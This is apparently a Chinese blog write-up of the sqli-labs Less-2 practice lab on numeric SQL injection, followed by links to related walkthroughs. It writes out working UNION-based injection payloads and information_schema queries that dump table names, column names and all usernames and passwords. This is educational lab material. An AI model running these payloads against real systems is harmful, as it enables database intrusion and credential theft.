【sqli-labs】Less2——数字型注入

最新推荐文章于 2024-01-15 15:33:20 发布
最新推荐文章于 2024-01-15 15:33:20 发布
阅读量238 收藏 1
点赞数
分类专栏: #sqli-labs 靶场和漏洞练习 文章标签: 数据库 mysql web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_71801652/article/details/131115634
版权

打开第二关页面,可以看到提示输入id参数
在这里插入图片描述
输入任意数字,可查询出对应的数据
在这里插入图片描述
存在可变参数id,注入可能存在。
1、判断注入点及注入类型
and 1=1 页面正常
在这里插入图片描述
and 1=2 页面异常或出错
在这里插入图片描述
确定注入点为id,注入类型为数字型注入。
2、判断字段数
order by 10 页面提示没有列数10
在这里插入图片描述
逐步采用二分法进行列数判断
直到order by 3时,页面正常
在这里插入图片描述
order by 4 页面报错
在这里插入图片描述
由此确定,字段数为3(介于正常与报错之间的正常值)。
3、判断回显位置
联合查询union select,这里注意要让前面的查询报错,这样页面在联合查询的情况下,会显示出后半部分查询出来的数据,如本题中在ID前面加个负号,因为id值不为负。这样前面出错的情况下,就可以查询出后面数据的回显位置。
在这里插入图片描述
确定回显位置为2,3。
4、爆数据库,版本,当前数据库用户等信息
在这里插入图片描述
数据库:security
版本:5.5.53
5、爆数据库中表名

group_concat(table_name) from information_schema.tables where table_schema=database()%23

在这里插入图片描述
得到数据库中的表有:emails,referers,uagents,users
6、查询指定表users中的列名

group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'%23

在这里插入图片描述
users表中的列名有id,username,password
7、查询users表中的数据

select 1,group_concat(username),group_concat(password) from users%23

在这里插入图片描述
至此,得到所有用户名和密码。

Coisini话不投机养乐多
关注
专栏目录
sqli-labs注入——sqli-labs的1-65关闯关指南
qq_51366383的博客
01-27 1763
sqli-labs图片上一共有75关,但是下载的资料都只有65关,所以只写了65关,本文仅是个人想法,如有不对请多谅解。 前面三部分的数据为:security 1、Emails Id ,email_id 2、referers 3、Uagents id,uagent,ip_address,username 4、Users id,username,password password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,
sqli-labs Less-32、33、34、35、36、37(sqli-labs闯关指南 32、33、34、35、36、37)—宽字节注入
m0_54899775的博客
12-26 1875
sqli-labs Less-32、33、34、35、36、37(sqli-labs闯关指南 32、33、34、35、36、37)—宽字节注入
sqli less-02
ANYOUZHEN的博客
04-30 406
输入id=1,回显正常,输入id=1',回显异常,接着输入id=1'--+ 输入id=1'--+仍然报错 其是整型(id=$id limit 0,1),然后不加单引号 猜测成功,我们用常规sql思路走走 ?id=1 order by 3--+ 我们发现表格只有3列 我们使用联合查询进行查找,由于整数型,我们删去’ 输入?id=-1 union select 1,2,3--+ 接着查询数据库?id=-1 union select 1,2,database()--+ ...
Sqli-labs之Less-2
m0_46315342的博客
06-04 473
                                    Less-2   =...
sqli-labs关卡2(基于get提交的数字型注入)通关思路
zyh1588的博客
10-21 347
从前有一个名字叫小白的人类,踏入sqli-labs靶场第二关后一去不复返......
SQLi-LABS的Less2分析
最新发布
haoahaoahaoahao的博客
01-15 487
那么在mysql数据库有一个数据库information_schema那么这数据库有4个表分别是 schema_privileges,schemata,tables,columns。在id= 1的时候没报语法错误,那么猜测这存在sql注入漏洞,大概查询语句为select * from where id = 1 limit 0.1。知道id= 1没报错后那么我们使用order by命令看看这表的列数有几列吧,那么输入?id=1 order by 2 --+ 的时候报错了,说明这列数为3。
sqli-labs:less-2(数字型报错注入
羽的博客
07-12 244
贴上源代码: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html...
sqli-labs Less-54、55、56、57(sqli-labs闯关指南 54、55、56、57)
m0_54899775的博客
12-29 1679
sqli-labs Less-54、55、56、57(sqli-labs闯关指南 54、55、56、57)
我的白帽之路-SQL注入数字型注入sqli-labs Less-2】
Offsett的博客
02-27 400
我的白帽之路
sqli-labs Less-46、47、48、49(sqli-labs闯关指南 46、47、48、49)—order by 相关注入
m0_54899775的博客
12-28 1216
sqli-labs Less-46、47、48、49(sqli-labs闯关指南 46、47、48、49)—order by 相关注入
SQLsqli-labs注入Less-2~4
Nuyoah的博客
12-13 474
与Less-1相同,我们同样使用?id=1'看是否可以注入, 发现不可以,并且提示错误,我们可以知道,这里多加了一个引号,这就是与Less-1不同的地方,除此之外,以下步骤与Less-1相同 2.接下来我们使用 order by 查看有多少列 仍然有三列3.使用联合查询 union select 看有哪些数据可以回显 4.接下来查询所有数据库 5.继续查询表 6.再查询列 7.最后取出所有数据 ...
sqli-labs Less-2解题思路
qq_35266419的博客
05-09 888
首先声明一下,我自己也是一名小白,或者你可以叫我“脚本小子”。只是喜欢这个东西就去钻研,有一点心得就发布出来与大家探讨,有问题请多多指教。末尾更精彩! Less-2 GET-Error based-intiger based ①打开页面,如图所示: ②[如图所示:please input the ID as parameter … ]此处id 传递参数,先测试是否存在漏洞 ③根据返回错误页面...
Sqli-Labs之less-2
ISNS的博客
02-05 984
说在开头:文章是我通过查询资料后按照自己的理解总结出来的,所以如果有说法不对的地方,欢迎大佬指正~
通过sqli-labs学习sql注入——基础挑战之less1-10
热门推荐
giantbranch的专栏
05-02 5万+
欢迎光顾我的新博客:https://www.giantbranch.cn 本文链接:http://blog.csdn.net/u012763794/article/details/51207833 虽然sql注入接触过不少,其实也不太多,但是不系统,那就通过sqli-libs系统学习总结一下吧 注:第一个就说得详细一点,后面的有新知识才会说,所以第一个一定要看!!!如果第一个还有不明白的地方...
sql-labs-less1/2|SQL注入
TenG的博客
09-18 965
前言: 此系类文章为SQL注入讲解,在本地搭建sql-labs环境进行sql注入,我也是刚开始学sql注入,本篇文章为sql-labs前两关注入讲解,后面的会在学过以后陆续发布,写此系类文章是为了以后方便回顾,也希望能够帮到大家,如果有不正确的地方欢迎指正,由于讲解比较详细,操作过程截图比较多,全文比较干,大家谅解、感谢支持。 所需环境: phpstudy,sql-labs 工具: hackbar,可以不用这个工具,只是为了方便一点,我用的是免费版的。 关卡: Less-1、Less-2 正文: Less-
SQL注入常用语法(sqli-labs-less1-3)
初学者L_言的博客
02-12 359
sqli-labs:less1-3为例 less-1(字符型注入) 主要代码: <?php //including the Mysql connect parameters. include("../sql-connections/sql-connect.php"); error_reporting(0); // take the variables if(isset($_GET['id...
Sqli-Labs学习sql注入Sqli-Labs less-1&2
vegetable_haker的博客
10-25 860
Sqli-Labs:Less-1 尝试传入参数 localhost/sqlilabs/Less-1/?id=1 localhost/sqlilabs/Less-1/?id=1' localhost/sqlilabs/Less-1/?id=1'' localhost/sqlilabs/Less-1/?id=1''' 在测试以上传参的时候发现第一和第三条的时候页面能正...
SQL注入环境搭建及多种注入类型测试实验
晓宇的博客
04-14 5678
SQL注入环境搭建及多种注入类型测试实验
MySQL注入实战指南——Sqli-labs教程解析
"MySQL注入天书——Sqli-labs使用手册" 这篇文档是关于MySQL注入技术的详细指南,特别关注于使用Sqli-labs进行实战练习。作者Lcamry在2016年编写了这份手册,旨在帮助读者理解和掌握SQL注入攻击与防御的相关知识。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值